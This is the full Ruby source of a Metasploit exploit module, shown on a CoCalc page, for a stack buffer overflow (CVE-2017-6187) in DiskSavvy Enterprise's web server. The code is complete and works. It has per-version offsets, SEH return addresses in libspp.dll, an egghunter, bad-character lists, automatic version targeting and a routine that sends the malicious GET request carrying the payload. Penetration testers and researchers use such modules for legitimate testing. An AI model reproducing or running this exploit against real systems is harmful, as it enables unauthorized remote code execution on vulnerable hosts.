Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/disksavvy_get_bof.rb
19848 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Seh

10
  include Msf::Exploit::Remote::Egghunter

11
  include Msf::Exploit::Remote::HttpClient

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'DiskSavvy Enterprise GET Buffer Overflow',

18
        'Description' => %q{

19
          This module exploits a stack-based buffer overflow vulnerability

20
          in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,

21
          caused by improper bounds checking of the request path in HTTP GET

22
          requests sent to the built-in web server. This module has been

23
          tested successfully on Windows XP SP3 and Windows 7 SP1.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'vportal', # Vulnerability discovery and PoC

28
          'Gabor Seljan' # Metasploit module

29
        ],

30
        'References' => [

31
          ['CVE', '2017-6187'],

32
          ['EDB', '40869']

33
        ],

34
        'DefaultOptions' => {

35
          'EXITFUNC' => 'thread'

36
        },

37
        'Platform' => 'win',

38
        'Payload' => {

39
          'BadChars' => "\x00\x09\x0a\x0d\x20",

40
          'Space' => 500

41
        },

42
        'Targets' => [

43
          [

44
            'Automatic Targeting',

45
            {

46
              'auto' => true

47
            }

48
          ],

49
          [

50
            'DiskSavvy Enterprise v9.1.14',

51
            {

52
              'Offset' => 542,

53
              'Ret' => 0x101142c0  # POP # POP # RET [libspp.dll]

54
            }

55
          ],

56
          [

57
            'DiskSavvy Enterprise v9.3.14',

58
            {

59
              'Offset' => 2478,

60
              'Ret' => 0x101142ff  # POP # POP # RET [libspp.dll]

61
            }

62
          ]

63
        ],

64
        'Privileged' => true,

65
        'DisclosureDate' => '2016-12-01',

66
        'DefaultTarget' => 0,

67
        'Notes' => {

68
          'Reliability' => UNKNOWN_RELIABILITY,

69
          'Stability' => UNKNOWN_STABILITY,

70
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

71
        }

72
      )

73
    )

74
  end

75


76
  def check

77
    res = send_request_cgi(

78
      'method' => 'GET',

79
      'uri' => '/'

80
    )

81


82
    if res && res.code == 200

83
      version = res.body[/Disk Savvy Enterprise v[^<]*/]

84
      if version

85
        vprint_status("Version detected: #{version}")

86
        if version =~ /9\.(1|3)\.14/

87
          return Exploit::CheckCode::Appears

88
        end

89


90
        return Exploit::CheckCode::Detected

91
      end

92
    else

93
      vprint_error('Unable to determine due to a HTTP connection timeout')

94
      return Exploit::CheckCode::Unknown

95
    end

96


97
    Exploit::CheckCode::Safe

98
  end

99


100
  def exploit

101
    mytarget = target

102


103
    if target['auto']

104
      mytarget = nil

105


106
      print_status('Automatically detecting the target...')

107


108
      res = send_request_cgi(

109
        'method' => 'GET',

110
        'uri' => '/'

111
      )

112


113
      if res && res.code == 200

114
        if res.body =~ /Disk Savvy Enterprise v9\.1\.14/

115
          mytarget = targets[1]

116
        elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/

117
          mytarget = targets[2]

118
        end

119
      end

120


121
      if !mytarget

122
        fail_with(Failure::NoTarget, 'No matching target')

123
      end

124


125
      print_status("Selected target: #{mytarget.name}")

126
    end

127


128
    eggoptions = {

129
      checksum: true,

130
      eggtag: rand_text_alpha(4, payload_badchars)

131
    }

132


133
    hunter, egg = generate_egghunter(

134
      payload.encoded,

135
      payload_badchars,

136
      eggoptions

137
    )

138


139
    sploit = make_nops(10)

140
    sploit << egg

141
    sploit << rand_text_alpha(mytarget['Offset'] - egg.length)

142
    sploit << generate_seh_record(mytarget.ret)

143
    sploit << make_nops(8)

144
    sploit << hunter

145
    sploit << rand_text_alpha(4500)

146


147
    print_status('Sending malicious request...')

148


149
    send_request_cgi(

150
      'method' => 'GET',

151
      'uri' => sploit

152
    )

153
  end

154
end

155


156